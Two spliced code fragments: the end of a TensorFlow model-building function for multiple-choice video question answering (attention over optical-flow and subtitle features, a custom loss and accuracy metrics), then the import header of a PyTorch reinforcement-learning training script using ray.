rgb_question_answer3_cnn = tf.squeeze(rgb_question_answer3_cnn, 2)
rgb_question_answer4_cnn = tf.squeeze(rgb_question_answer4_cnn, 2)
rgb_question_answer0_fc = tf.layers.dense(rgb_question_answer0_att, 1, activation=tf.nn.leaky_relu,
kernel_regularizer=regularizer, name='rgb_mask_fc')
rgb_question_answer1_fc = tf.layers.dense(rgb_question_answer1_att, 1, activation=tf.nn.leaky_relu,
kernel_regularizer=regularizer, name='rgb_mask_fc', reuse=True)
rgb_question_answer2_fc = tf.layers.dense(rgb_question_answer2_att, 1, activation=tf.nn.leaky_relu,
kernel_regularizer=regularizer, name='rgb_mask_fc', reuse=True)
rgb_question_answer3_fc = tf.layers.dense(rgb_question_answer3_att, 1, activation=tf.nn.leaky_relu,
kernel_regularizer=regularizer, name='rgb_mask_fc', reuse=True)
rgb_question_answer4_fc = tf.layers.dense(rgb_question_answer4_att, 1, activation=tf.nn.leaky_relu,
kernel_regularizer=regularizer, name='rgb_mask_fc', reuse=True)
rgb_question_answer0_fc = tf.nn.dropout(rgb_question_answer0_fc, prob[0][0])
rgb_question_answer1_fc = tf.nn.dropout(rgb_question_answer1_fc, prob[0][0])
rgb_question_answer2_fc = tf.nn.dropout(rgb_question_answer2_fc, prob[0][0])
rgb_question_answer3_fc = tf.nn.dropout(rgb_question_answer3_fc, prob[0][0])
rgb_question_answer4_fc = tf.nn.dropout(rgb_question_answer4_fc, prob[0][0])
rgb_question_answer0_fc = tf.squeeze(rgb_question_answer0_fc, 2)
rgb_question_answer1_fc = tf.squeeze(rgb_question_answer1_fc, 2)
rgb_question_answer2_fc = tf.squeeze(rgb_question_answer2_fc, 2)
rgb_question_answer3_fc = tf.squeeze(rgb_question_answer3_fc, 2)
rgb_question_answer4_fc = tf.squeeze(rgb_question_answer4_fc, 2)
'''
with tf.variable_scope("Flow_train_question_match", reuse=tf.AUTO_REUSE):
flow_logits = tf.layers.dense(flow_logits, 400, name="Flow_text_fc", kernel_regularizer=regularizer,
activation=tf.nn.leaky_relu)
flow_logits = tf.nn.dropout(flow_logits, prob[0][0])
flow_logits = tf.layers.batch_normalization(flow_logits, training=is_training[0][0])
question_flow = tf.layers.dense(question_rnn_logits, 400, name="Flow_question_dense", kernel_regularizer=regularizer,
activation=tf.nn.leaky_relu)
# question_d = tf.reduce_max(question_rnn_logits, axis=1, keepdims=True)
# question_flow = tf.layers.dense(question_d, 300, name="flow_question_dense", kernel_regularizer=regularizer,
# activation=tf.nn.leaky_relu)
question_flow = tf.nn.dropout(question_flow, prob[0][0])
question_flow = tf.layers.batch_normalization(question_flow, training=is_training[0][0])
flow_question_mul = tf.matmul(flow_logits, tf.transpose(question_flow, perm=[0, 2, 1]))
flow_question_similarity = tf.nn.softmax(flow_question_mul)
flow_question_masked = tf.matmul(flow_question_similarity, question_flow)
# flow_question_masked = tf.matmul(flow_question_similarity, tf.transpose(flow_logits, perm=[0, 2, 1]))
# flow_question_masked = tf.squeeze(flow_question_masked, axis=2)
with tf.variable_scope("Flow_train_answer_match", reuse=tf.AUTO_REUSE):
# answer0_d = tf.reduce_max(answer0_rnn_logits, axis=1, keepdims=True)
# answer1_d = tf.reduce_max(answer1_rnn_logits, axis=1, keepdims=True)
# answer2_d = tf.reduce_max(answer2_rnn_logits, axis=1, keepdims=True)
# answer3_d = tf.reduce_max(answer3_rnn_logits, axis=1, keepdims=True)
# answer4_d = tf.reduce_max(answer4_rnn_logits, axis=1, keepdims=True)
# answer0_flow = tf.layers.dense(answer0_d, 300, name="flow_answer_dense", kernel_regularizer=regularizer,
# activation=tf.nn.leaky_relu)
# answer1_flow = tf.layers.dense(answer1_d, 300, name="flow_answer_dense", kernel_regularizer=regularizer,
# activation=tf.nn.leaky_relu)
# answer2_flow = tf.layers.dense(answer2_d, 300, name="flow_answer_dense", kernel_regularizer=regularizer,
# activation=tf.nn.leaky_relu)
# answer3_flow = tf.layers.dense(answer3_d, 300, name="flow_answer_dense", kernel_regularizer=regularizer,
# activation=tf.nn.leaky_relu)
# answer4_flow = tf.layers.dense(answer4_d, 300, name="flow_answer_dense", kernel_regularizer=regularizer,
# activation=tf.nn.leaky_relu)
answer0_flow = tf.layers.dense(answer0_rnn_logits, 400, name="Flow_answer_dense", kernel_regularizer=regularizer,
activation=tf.nn.leaky_relu)
answer1_flow = tf.layers.dense(answer1_rnn_logits, 400, name="Flow_answer_dense", kernel_regularizer=regularizer,
activation=tf.nn.leaky_relu, reuse=True)
answer2_flow = tf.layers.dense(answer2_rnn_logits, 400, name="Flow_answer_dense", kernel_regularizer=regularizer,
activation=tf.nn.leaky_relu, reuse=True)
answer3_flow = tf.layers.dense(answer3_rnn_logits, 400, name="Flow_answer_dense", kernel_regularizer=regularizer,
activation=tf.nn.leaky_relu, reuse=True)
answer4_flow = tf.layers.dense(answer4_rnn_logits, 400, name="Flow_answer_dense", kernel_regularizer=regularizer,
activation=tf.nn.leaky_relu, reuse=True)
answer0_flow = tf.nn.dropout(answer0_flow, prob[0][0])
answer1_flow = tf.nn.dropout(answer1_flow, prob[0][0])
answer2_flow = tf.nn.dropout(answer2_flow, prob[0][0])
answer3_flow = tf.nn.dropout(answer3_flow, prob[0][0])
answer4_flow = tf.nn.dropout(answer4_flow, prob[0][0])
answer0_flow = tf.layers.batch_normalization(answer0_flow, training=is_training[0][0])
answer1_flow = tf.layers.batch_normalization(answer1_flow, training=is_training[0][0])
answer2_flow = tf.layers.batch_normalization(answer2_flow, training=is_training[0][0])
answer3_flow = tf.layers.batch_normalization(answer3_flow, training=is_training[0][0])
answer4_flow = tf.layers.batch_normalization(answer4_flow, training=is_training[0][0])
flow_answer0_mul = tf.matmul(flow_logits, tf.transpose(answer0_flow, perm=[0, 2, 1]))
flow_answer1_mul = tf.matmul(flow_logits, tf.transpose(answer1_flow, perm=[0, 2, 1]))
flow_answer2_mul = tf.matmul(flow_logits, tf.transpose(answer2_flow, perm=[0, 2, 1]))
flow_answer3_mul = tf.matmul(flow_logits, tf.transpose(answer3_flow, perm=[0, 2, 1]))
flow_answer4_mul = tf.matmul(flow_logits, tf.transpose(answer4_flow, perm=[0, 2, 1]))
# flow_answer0_mul = tf.matmul(tf.transpose(answer0_d, [0, 2, 1]), flow_logits)
# flow_answer1_mul = tf.matmul(tf.transpose(answer1_d, [0, 2, 1]), flow_logits)
# flow_answer2_mul = tf.matmul(tf.transpose(answer2_d, [0, 2, 1]), flow_logits)
# flow_answer3_mul = tf.matmul(tf.transpose(answer3_d, [0, 2, 1]), flow_logits)
# flow_answer4_mul = tf.matmul(tf.transpose(answer4_d, [0, 2, 1]), flow_logits)
flow_answer0_similarity = tf.nn.softmax(flow_answer0_mul)
flow_answer1_similarity = tf.nn.softmax(flow_answer1_mul)
flow_answer2_similarity = tf.nn.softmax(flow_answer2_mul)
flow_answer3_similarity = tf.nn.softmax(flow_answer3_mul)
flow_answer4_similarity = tf.nn.softmax(flow_answer4_mul)
flow_answer0_masked = tf.matmul(flow_answer0_similarity, answer0_flow)
flow_answer1_masked = tf.matmul(flow_answer1_similarity, answer1_flow)
flow_answer2_masked = tf.matmul(flow_answer2_similarity, answer2_flow)
flow_answer3_masked = tf.matmul(flow_answer3_similarity, answer3_flow)
flow_answer4_masked = tf.matmul(flow_answer4_similarity, answer4_flow)
# flow_answer0_mask = tf.matmul(flow_answer0_similarity, tf.transpose(flow_logits, perm=[0, 2, 1]))
# flow_answer1_mask = tf.matmul(flow_answer1_similarity, tf.transpose(flow_logits, perm=[0, 2, 1]))
# flow_answer2_mask = tf.matmul(flow_answer2_similarity, tf.transpose(flow_logits, perm=[0, 2, 1]))
# flow_answer3_mask = tf.matmul(flow_answer3_similarity, tf.transpose(flow_logits, perm=[0, 2, 1]))
# flow_answer4_mask = tf.matmul(flow_answer4_similarity, tf.transpose(flow_logits, perm=[0, 2, 1]))
# flow_answer0_mask = tf.squeeze(flow_answer0_mask, axis=2)
# flow_answer1_mask = tf.squeeze(flow_answer1_mask, axis=2)
# flow_answer2_mask = tf.squeeze(flow_answer2_mask, axis=2)
# flow_answer3_mask = tf.squeeze(flow_answer3_mask, axis=2)
# flow_answer4_mask = tf.squeeze(flow_answer4_mask, axis=2)
with tf.variable_scope("Flow_train_question_answer_att_layer", reuse=tf.AUTO_REUSE):
flow_question_answer0_att = tf.concat([flow_logits, flow_question_masked, flow_answer0_masked,
tf.multiply(flow_logits, flow_question_masked),
tf.multiply(flow_logits, flow_answer0_masked)], axis=2)
flow_question_answer1_att = tf.concat([flow_logits, flow_question_masked, flow_answer1_masked,
tf.multiply(flow_logits, flow_question_masked),
tf.multiply(flow_logits, flow_answer1_masked)], axis=2)
flow_question_answer2_att = tf.concat([flow_logits, flow_question_masked, flow_answer2_masked,
tf.multiply(flow_logits, flow_question_masked),
tf.multiply(flow_logits, flow_answer2_masked)], axis=2)
flow_question_answer3_att = tf.concat([flow_logits, flow_question_masked, flow_answer3_masked,
tf.multiply(flow_logits, flow_question_masked),
tf.multiply(flow_logits, flow_answer3_masked)], axis=2)
flow_question_answer4_att = tf.concat([flow_logits, flow_question_masked, flow_answer4_masked,
tf.multiply(flow_logits, flow_question_masked),
tf.multiply(flow_logits, flow_answer4_masked)], axis=2)
#flow_rnn_model = video_rnn.vRNN('LSTM', 1000, 'Flow')
#flow_question_answer0_att = flow_rnn_model.build(flow_question_answer0_att, prob, flow_seq_len)
#flow_question_answer1_att = flow_rnn_model.build(flow_question_answer1_att, prob, flow_seq_len)
#flow_question_answer2_att = flow_rnn_model.build(flow_question_answer2_att, prob, flow_seq_len)
#flow_question_answer3_att = flow_rnn_model.build(flow_question_answer3_att, prob, flow_seq_len)
#flow_question_answer4_att = flow_rnn_model.build(flow_question_answer4_att, prob, flow_seq_len)
#flow_question_answer0_att = tf.reduce_max(flow_question_answer0_att, 1)
#flow_question_answer1_att = tf.reduce_max(flow_question_answer1_att, 1)
#flow_question_answer2_att = tf.reduce_max(flow_question_answer2_att, 1)
#flow_question_answer3_att = tf.reduce_max(flow_question_answer3_att, 1)
#flow_question_answer4_att = tf.reduce_max(flow_question_answer4_att, 1)
# flow_question_answer0_att = tf.concat([flow_question_masked, flow_answer0_mask], axis=1)
# flow_question_answer1_att = tf.concat([flow_question_masked, flow_answer1_mask], axis=1)
# flow_question_answer2_att = tf.concat([flow_question_masked, flow_answer2_mask], axis=1)
# flow_question_answer3_att = tf.concat([flow_question_masked, flow_answer3_mask], axis=1)
# flow_question_answer4_att = tf.concat([flow_question_masked, flow_answer4_mask], axis=1)
# flow_question_answer0_att = tf.matmul(flow_question_masked, tf.transpose(flow_answer0_mask, perm=[0, 2, 1]))
# flow_question_answer1_att = tf.matmul(flow_question_masked, tf.transpose(flow_answer1_mask, perm=[0, 2, 1]))
# flow_question_answer2_att = tf.matmul(flow_question_masked, tf.transpose(flow_answer2_mask, perm=[0, 2, 1]))
# flow_question_answer3_att = tf.matmul(flow_question_masked, tf.transpose(flow_answer3_mask, perm=[0, 2, 1]))
# flow_question_answer4_att = tf.matmul(flow_question_masked, tf.transpose(flow_answer4_mask, perm=[0, 2, 1]))
'''
flow_question_answer0_cnn = tf.layers.conv1d(flow_question_answer0_att, 1, 1, padding='same',
activation=tf.nn.leaky_relu, kernel_regularizer=regularizer,
kernel_initializer=tf.initializers.random_normal, name="flow_conv")
flow_question_answer1_cnn = tf.layers.conv1d(flow_question_answer1_att, 1, 1, padding='same',
activation=tf.nn.leaky_relu, kernel_regularizer=regularizer,
name="flow_conv", reuse=True)
flow_question_answer2_cnn = tf.layers.conv1d(flow_question_answer2_att, 1, 1, padding='same',
activation=tf.nn.leaky_relu, kernel_regularizer=regularizer,
name="flow_conv", reuse=True)
flow_question_answer3_cnn = tf.layers.conv1d(flow_question_answer3_att, 1, 1, padding='same',
activation=tf.nn.leaky_relu, kernel_regularizer=regularizer,
name="flow_conv", reuse=True)
flow_question_answer4_cnn = tf.layers.conv1d(flow_question_answer4_att, 1, 1, padding='same',
activation=tf.nn.leaky_relu, kernel_regularizer=regularizer,
name="flow_conv", reuse=True)
flow_question_answer0_cnn = tf.nn.dropout(flow_question_answer0_cnn, prob[0][0])
flow_question_answer1_cnn = tf.nn.dropout(flow_question_answer1_cnn, prob[0][0])
flow_question_answer2_cnn = tf.nn.dropout(flow_question_answer2_cnn, prob[0][0])
flow_question_answer3_cnn = tf.nn.dropout(flow_question_answer3_cnn, prob[0][0])
flow_question_answer4_cnn = tf.nn.dropout(flow_question_answer4_cnn, prob[0][0])
flow_question_answer0_cnn = tf.squeeze(flow_question_answer0_cnn, 2)
flow_question_answer1_cnn = tf.squeeze(flow_question_answer1_cnn, 2)
flow_question_answer2_cnn = tf.squeeze(flow_question_answer2_cnn, 2)
flow_question_answer3_cnn = tf.squeeze(flow_question_answer3_cnn, 2)
flow_question_answer4_cnn = tf.squeeze(flow_question_answer4_cnn, 2)
'''
'''
flow_question_answer0_fc = tf.layers.dense(flow_question_answer0_att, 2000, activation=tf.nn.leaky_relu,
kernel_regularizer=regularizer, name="Flow_mask_fc")
flow_question_answer1_fc = tf.layers.dense(flow_question_answer1_att, 2000, activation=tf.nn.leaky_relu,
kernel_regularizer=regularizer, name="Flow_mask_fc", reuse=True)
flow_question_answer2_fc = tf.layers.dense(flow_question_answer2_att, 2000, activation=tf.nn.leaky_relu,
kernel_regularizer=regularizer, name="Flow_mask_fc", reuse=True)
flow_question_answer3_fc = tf.layers.dense(flow_question_answer3_att, 2000, activation=tf.nn.leaky_relu,
kernel_regularizer=regularizer, name="Flow_mask_fc", reuse=True)
flow_question_answer4_fc = tf.layers.dense(flow_question_answer4_att, 2000, activation=tf.nn.leaky_relu,
kernel_regularizer=regularizer, name="Flow_mask_fc", reuse=True)
flow_question_answer0_fc = tf.nn.dropout(flow_question_answer0_fc, keep_prob=prob[0][0])
flow_question_answer1_fc = tf.nn.dropout(flow_question_answer1_fc, keep_prob=prob[0][0])
flow_question_answer2_fc = tf.nn.dropout(flow_question_answer2_fc, keep_prob=prob[0][0])
flow_question_answer3_fc = tf.nn.dropout(flow_question_answer3_fc, keep_prob=prob[0][0])
flow_question_answer4_fc = tf.nn.dropout(flow_question_answer4_fc, keep_prob=prob[0][0])
'''
#flow_question_answer0_fc = tf.reduce_max(flow_question_answer0_att, 1)
#flow_question_answer1_fc = tf.reduce_max(flow_question_answer1_att, 1)
#flow_question_answer2_fc = tf.reduce_max(flow_question_answer2_att, 1)
#flow_question_answer3_fc = tf.reduce_max(flow_question_answer3_att, 1)
#flow_question_answer4_fc = tf.reduce_max(flow_question_answer4_att, 1)
# flow_question_answer0_fc = tf.squeeze(flow_question_answer0_fc, 2)
# flow_question_answer1_fc = tf.squeeze(flow_question_answer1_fc, 2)
# flow_question_answer2_fc = tf.squeeze(flow_question_answer2_fc, 2)
# flow_question_answer3_fc = tf.squeeze(flow_question_answer3_fc, 2)
# flow_question_answer4_fc = tf.squeeze(flow_question_answer4_fc, 2)
with tf.variable_scope("video_fc", reuse=tf.AUTO_REUSE):
# rgb_answer0_g_logits = tf.layers.dense(rgb_question_answer0_fc, 1, name="RGB_fc",
# kernel_regularizer=regularizer, activation=tf.nn.leaky_relu)
# rgb_answer1_g_logits = tf.layers.dense(rgb_question_answer1_fc, 1, name="RGB_fc",
# kernel_regularizer=regularizer, activation=tf.nn.leaky_relu, reuse=True)
# rgb_answer2_g_logits = tf.layers.dense(rgb_question_answer2_fc, 1, name="RGB_fc",
# kernel_regularizer=regularizer, activation=tf.nn.leaky_relu, reuse=True)
# rgb_answer3_g_logits = tf.layers.dense(rgb_question_answer3_fc, 1, name="RGB_fc",
# kernel_regularizer=regularizer, activation=tf.nn.leaky_relu, reuse=True)
# rgb_answer4_g_logits = tf.layers.dense(rgb_question_answer4_fc, 1, name="RGB_fc",
# kernel_regularizer=regularizer, activation=tf.nn.leaky_relu, reuse=True)
# rgb_answer0_g_logits = tf.nn.dropout(rgb_answer0_g_logits, prob[0][0])
# rgb_answer1_g_logits = tf.nn.dropout(rgb_answer1_g_logits, prob[0][0])
# rgb_answer2_g_logits = tf.nn.dropout(rgb_answer2_g_logits, prob[0][0])
# rgb_answer3_g_logits = tf.nn.dropout(rgb_answer3_g_logits, prob[0][0])
# rgb_answer4_g_logits = tf.nn.dropout(rgb_answer4_g_logits, prob[0][0])
flow_answer0_g_logits = tf.layers.dense(flow_question_answer0_att, 1, name="Flow_fc",
kernel_regularizer=regularizer, activation=tf.nn.leaky_relu)
flow_answer1_g_logits = tf.layers.dense(flow_question_answer1_att, 1, name="Flow_fc",
kernel_regularizer=regularizer, activation=tf.nn.leaky_relu, reuse=True)
flow_answer2_g_logits = tf.layers.dense(flow_question_answer2_att, 1, name="Flow_fc",
kernel_regularizer=regularizer, activation=tf.nn.leaky_relu, reuse=True)
flow_answer3_g_logits = tf.layers.dense(flow_question_answer3_att, 1, name="Flow_fc",
kernel_regularizer=regularizer, activation=tf.nn.leaky_relu, reuse=True)
flow_answer4_g_logits = tf.layers.dense(flow_question_answer4_att, 1, name="Flow_fc",
kernel_regularizer=regularizer, activation=tf.nn.leaky_relu, reuse=True)
flow_answer0_g_logits = tf.nn.dropout(flow_answer0_g_logits, prob[0][0])
flow_answer1_g_logits = tf.nn.dropout(flow_answer1_g_logits, prob[0][0])
flow_answer2_g_logits = tf.nn.dropout(flow_answer2_g_logits, prob[0][0])
flow_answer3_g_logits = tf.nn.dropout(flow_answer3_g_logits, prob[0][0])
flow_answer4_g_logits = tf.nn.dropout(flow_answer4_g_logits, prob[0][0])
flow_answer0_g_logits = tf.layers.batch_normalization(flow_answer0_g_logits, training=is_training[0][0])
flow_answer1_g_logits = tf.layers.batch_normalization(flow_answer1_g_logits, training=is_training[0][0])
flow_answer2_g_logits = tf.layers.batch_normalization(flow_answer2_g_logits, training=is_training[0][0])
flow_answer3_g_logits = tf.layers.batch_normalization(flow_answer3_g_logits, training=is_training[0][0])
flow_answer4_g_logits = tf.layers.batch_normalization(flow_answer4_g_logits, training=is_training[0][0])
flow_answer0_g_logits = tf.reduce_max(flow_answer0_g_logits, 1)
flow_answer1_g_logits = tf.reduce_max(flow_answer1_g_logits, 1)
flow_answer2_g_logits = tf.reduce_max(flow_answer2_g_logits, 1)
flow_answer3_g_logits = tf.reduce_max(flow_answer3_g_logits, 1)
flow_answer4_g_logits = tf.reduce_max(flow_answer4_g_logits, 1)
with tf.variable_scope("post_rnn", reuse=tf.AUTO_REUSE):
# subtitle_question_g_rnn_model = text_rnn_cudnn.tRNN("LSTM", FLAGS.num_hidden, "subtitle_question_g")
subtitle_answer_g_rnn_model = text_rnn_cudnn.tRNN("LSTM", FLAGS.num_hidden * 5, "subtitle_answer_g")
# subtitle_question_g_rnn_logits = subtitle_question_g_rnn_model.build(subtitle_question_g,
# is_training=FLAGS.is_training,
# seq_len=sub_seq_len)
subtitle_answer0_g_rnn_logits = subtitle_answer_g_rnn_model.build(concat_subtitle_query0,
dropout_keep_prob=text_prob,
seq_len=sub_seq_len)
subtitle_answer1_g_rnn_logits = subtitle_answer_g_rnn_model.build(concat_subtitle_query1,
dropout_keep_prob=text_prob,
seq_len=sub_seq_len)
subtitle_answer2_g_rnn_logits = subtitle_answer_g_rnn_model.build(concat_subtitle_query2,
dropout_keep_prob=text_prob,
seq_len=sub_seq_len)
subtitle_answer3_g_rnn_logits = subtitle_answer_g_rnn_model.build(concat_subtitle_query3,
dropout_keep_prob=text_prob,
seq_len=sub_seq_len)
subtitle_answer4_g_rnn_logits = subtitle_answer_g_rnn_model.build(concat_subtitle_query4,
dropout_keep_prob=text_prob,
seq_len=sub_seq_len)
# subtitle_question_g_rnn_logits = tf.reduce_max(subtitle_question_g_rnn_logits, axis=1)
# subtitle_question_g_logits = tf.layers.dense(subtitle_question_g_rnn_logits, 1,
# name="subtitle_question_g_logits")
subtitle_answer0_g_rnn_logits = tf.reduce_max(subtitle_answer0_g_rnn_logits, axis=1)
subtitle_answer1_g_rnn_logits = tf.reduce_max(subtitle_answer1_g_rnn_logits, axis=1)
subtitle_answer2_g_rnn_logits = tf.reduce_max(subtitle_answer2_g_rnn_logits, axis=1)
subtitle_answer3_g_rnn_logits = tf.reduce_max(subtitle_answer3_g_rnn_logits, axis=1)
subtitle_answer4_g_rnn_logits = tf.reduce_max(subtitle_answer4_g_rnn_logits, axis=1)
subtitle_answer0_g_logits = tf.layers.dense(subtitle_answer0_g_rnn_logits, 1,
name="subtitle_answer_g_logits",
activation=tf.nn.leaky_relu)
subtitle_answer1_g_logits = tf.layers.dense(subtitle_answer1_g_rnn_logits, 1,
name="subtitle_answer_g_logits", reuse=True,
activation=tf.nn.leaky_relu)
subtitle_answer2_g_logits = tf.layers.dense(subtitle_answer2_g_rnn_logits, 1,
name="subtitle_answer_g_logits", reuse=True,
activation=tf.nn.leaky_relu)
subtitle_answer3_g_logits = tf.layers.dense(subtitle_answer3_g_rnn_logits, 1,
name="subtitle_answer_g_logits", reuse=True,
activation=tf.nn.leaky_relu)
subtitle_answer4_g_logits = tf.layers.dense(subtitle_answer4_g_rnn_logits, 1,
name="subtitle_answer_g_logits", reuse=True,
activation=tf.nn.leaky_relu)
# subtitle_answer_g_concat = tf.concat([subtitle_answer0_g_rnn_logits, subtitle_answer1_g_rnn_logits,
# subtitle_answer2_g_rnn_logits, subtitle_answer3_g_rnn_logits,
# subtitle_answer4_g_rnn_logits], axis=1)
# subtitle_answer_embed = tf.layers.dense(subtitle_answer_g_concat, 5, kernel_regularizer=regularizer,
# activation=tf.nn.leaky_relu, name="text_classifier")
'''
subtitle_answer0_g_logits = tf.layers.dropout(subtitle_answer0_g_logits, training=is_training)
subtitle_answer1_g_logits = tf.layers.dropout(subtitle_answer1_g_logits, training=is_training)
subtitle_answer2_g_logits = tf.layers.dropout(subtitle_answer2_g_logits, training=is_training)
subtitle_answer3_g_logits = tf.layers.dropout(subtitle_answer3_g_logits, training=is_training)
subtitle_answer4_g_logits = tf.layers.dropout(subtitle_answer4_g_logits, training=is_training)
'''
subtitle_answer0_g_logits = tf.nn.dropout(subtitle_answer0_g_logits, text_prob[0][0])
subtitle_answer1_g_logits = tf.nn.dropout(subtitle_answer1_g_logits, text_prob[0][0])
subtitle_answer2_g_logits = tf.nn.dropout(subtitle_answer2_g_logits, text_prob[0][0])
subtitle_answer3_g_logits = tf.nn.dropout(subtitle_answer3_g_logits, text_prob[0][0])
subtitle_answer4_g_logits = tf.nn.dropout(subtitle_answer4_g_logits, text_prob[0][0])
with tf.variable_scope("Embed"):
# subtitle_question_embed = tf.concat([subtitle_question_g_logits, subtitle_question_g_logits,
# subtitle_question_g_logits, subtitle_question_g_logits,
# subtitle_question_g_logits], axis=1)
subtitle_answer_embed = tf.concat([subtitle_answer0_g_logits, subtitle_answer1_g_logits,
subtitle_answer2_g_logits, subtitle_answer3_g_logits,
subtitle_answer4_g_logits], axis=1)
subtitle_text_embed = subtitle_answer_embed
# rgb_answer_embed = tf.concat([rgb_answer0_g_logits, rgb_answer1_g_logits, rgb_answer2_g_logits,
# rgb_answer3_g_logits, rgb_answer4_g_logits], axis=1)
flow_answer_embed = tf.concat([flow_answer0_g_logits, flow_answer1_g_logits, flow_answer2_g_logits,
flow_answer3_g_logits, flow_answer4_g_logits], axis=1)
'''
with tf.variable_scope("RGB_text_embed"):
rgb_rnn_logits = tf.reshape(tf.cast(rgb_rnn_logits, tf.float64), [-1, FLAGS.num_hidden*2, 1])
rgb_question_embed_logits = tf.matmul(question_rnn_logits, rgb_rnn_logits)
rgb_question_embed_logits = tf.concat([rgb_question_embed_logits, rgb_question_embed_logits,
rgb_question_embed_logits, rgb_question_embed_logits,
rgb_question_embed_logits], axis=1)
rgb_answer_embed_logits = tf.matmul(answer_rnn_logits, rgb_rnn_logits)
rgb_text_embed = rgb_question_embed_logits + rgb_answer_embed_logits
with tf.variable_scope("flow_text_embed"):
flow_rnn_logits = tf.reshape(tf.cast(flow_rnn_logits, tf.float64), [-1, FLAGS.num_hidden*2, 1])
flow_question_embed_logits = tf.matmul(question_rnn_logits, flow_rnn_logits)
flow_question_embed_logits = tf.concat([flow_question_embed_logits, flow_question_embed_logits,
flow_question_embed_logits, flow_question_embed_logits,
flow_question_embed_logits], axis=1)
flow_answer_embed_logits = tf.matmul(answer_rnn_logits, flow_rnn_logits)
flow_text_embed = flow_question_embed_logits + flow_answer_embed_logits
'''
# with tf.device("/GPU:1"):
with tf.variable_scope("prediction"):
def loss_calc(elem):
correct = elem[0][tf.argmax(elem[1])]
# loss1 = tf.maximum(tf.cast(0.0, tf.float32), FLAGS.margin - correct + elem[0][0])
# loss2 = tf.maximum(tf.cast(0.0, tf.float32), FLAGS.margin - correct + elem[0][1])
# loss3 = tf.maximum(tf.cast(0.0, tf.float32), FLAGS.margin - correct + elem[0][2])
# loss4 = tf.maximum(tf.cast(0.0, tf.float32), FLAGS.margin - correct + elem[0][3])
# loss5 = tf.maximum(tf.cast(0.0, tf.float32), FLAGS.margin - correct + elem[0][4])
# not_loss = FLAGS.margin
loss1 = tf.exp(elem[0][0] - correct)
loss2 = tf.exp(elem[0][1] - correct)
loss3 = tf.exp(elem[0][2] - correct)
loss4 = tf.exp(elem[0][3] - correct)
loss5 = tf.exp(elem[0][4] - correct)
# return loss1 + loss2 + loss3 + loss4 + loss5 - not_loss
return tf.log(loss1 + loss2 + loss3 + loss4 + loss5)
video_logits = flow_answer_embed
total_logits = tf.nn.softmax(subtitle_text_embed, axis=1) + tf.scalar_mul(0.5,
tf.nn.softmax(video_logits, axis=1))
train_i3d_var_list = []
train_match_var_list = []
#reg_var_list = []
for v in tf.trainable_variables():
if v.name.startswith(u"Flow_train") or v.name.startswith(u"video"):
train_match_var_list.append(v)
if v.name.startswith(u"Flow") and not u"train" in v.name:
train_i3d_var_list.append(v)
#if not ('bias' in v.name) and ('bidirectional_rnn' in v.name) and "Flow" in v.name:
# reg_var_list.append(v)
# zero_tensor = tf.zeros([FLAGS.batch_size, 5], tf.int32)
# bool_mask = tf.equal(zero_tensor, a)
# margin_tensor = tf.constant(0.2, shape=[FLAGS.batch_size])
# ranking_pos = tf.gather(total_logits, tf.argmax(a, axis=1), axis=1)
# ranking_pos = tf.reduce_sum(ranking_pos, axis=1)
# ranking_neg = tf.boolean_mask(total_logits, bool_mask)
# ranking_neg = tf.reshape(ranking_neg, [-1, 4])
# ranking_neg = tf.reduce_sum(ranking_neg, axis=1)
# zero_tensor2 = tf.zeros([FLAGS.batch_size], tf.float32)
# loss = tf.map_fn(loss_calc, (total_logits, a), dtype=tf.float32)
video_loss = tf.map_fn(loss_calc, (video_logits, a), dtype=tf.float32)
# video_loss = tf.nn.softmax_cross_entropy_with_logits_v2(labels=a, logits=video_logits)
# loss = tf.maximum(zero_tensor2, margin_tensor - ranking_pos + ranking_neg)
reg_losses = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)
# cost = tf.reduce_mean(loss)
cost = tf.reduce_mean(video_loss) + tf.cast(tf.contrib.layers.apply_regularization(regularizer, reg_losses),
tf.float32)
# tf.add_to_collection('losses', cost)
# optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.lr)
# op = optimizer.minimize(cost, var_list=train_var_list)
comparison = tf.equal(tf.argmax(total_logits, axis=1), tf.argmax(a, axis=1))
video_comparison = tf.equal(tf.argmax(video_logits, axis=1), tf.argmax(a, axis=1))
accuracy = tf.reduce_mean(tf.cast(comparison, tf.float32), name="accuracy")
video_accuracy = tf.reduce_mean(tf.cast(video_comparison, tf.float32), name="accuracy")
# loss_summary = tf.summary.scalar("loss", cost)
# accuracy_summary = tf.summary.scalar("accuracy", accuracy)
# summary_op = tf.summary.merge([loss_summary, accuracy_summary])
# train_var_list = []
# for v in tf.trainable_variables():
# if v.name.startswith(u"RGB") or v.name.startswith(u"Flow"):
# train_var_list.append(v)
'''
prediction = tf.nn.softmax(total_logits, axis=1)
train_var_list = []
for v in tf.trainable_variables():
if not (v.name.startswith(u"RGB") or v.name.startswith(u"Flow")):
train_var_list.append(v)
#a = 3
#a = tf.squeeze(a, axis=[1])
#cost = tf.reduce_mean(-tf.reduce_sum(tf.cast(a, tf.float64) * tf.log(prediction), 1))
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(labels=a, logits=total_logits))
optimizer = tf.train.MomentumOptimizer(learning_rate=FLAGS.lr, momentum=0.9)
op = optimizer.minimize(cost, var_list=train_var_list)
comparison = tf.equal(tf.argmax(prediction, axis=1), tf.argmax(a, axis=1))
accuracy = tf.reduce_mean(tf.cast(comparison, tf.float64), name="accuracy")
loss_summary = tf.summary.scalar("loss", cost)
accuracy_summary = tf.summary.scalar("accuracy", accuracy)
summary_op = tf.summary.merge([loss_summary, accuracy_summary])
'''
return cost, accuracy, video_accuracy, qid, comparison, train_i3d_var_list, train_match_var_list |
19,270 | 35f3618b0f4e899536a4a6e145c2df1b28612fc9 | from itertools import count
from time import time
import gym
import scipy.optimize
from tensorboardX import SummaryWriter
from core.models import *
from torch.autograd import Variable
from torch import Tensor
import torch.tensor as tensor
# from core.agent import AgentCollection
from core.agent_ray import AgentCollection
from utils.utils import *
from core.running_state import ZFilter
# from core.common import estimate_advantages_parallel
from core.common_ray import estimate_advantages_parallel
from torch.nn.utils.convert_parameters import parameters_to_vector, vector_to_parameters
import numpy as np
from torch.distributions.kl import kl_divergence
# from core.natural_gradient import conjugate_gradient_gloabl
from core.natural_gradient_ray import conjugate_gradient_global
from core.policy_gradient import compute_policy_gradient_parallel
from core.log_determinant import compute_log_determinant
# from envs.mujoco.half_cheetah import HalfCheetahVelEnv_FL
import ray
import os
import envs
torch.utils.backcompat.broadcast_warning.enabled = True
torch.utils.backcompat.keepdim_warning.enabled = True
torch.set_default_tensor_type('torch.DoubleTensor')
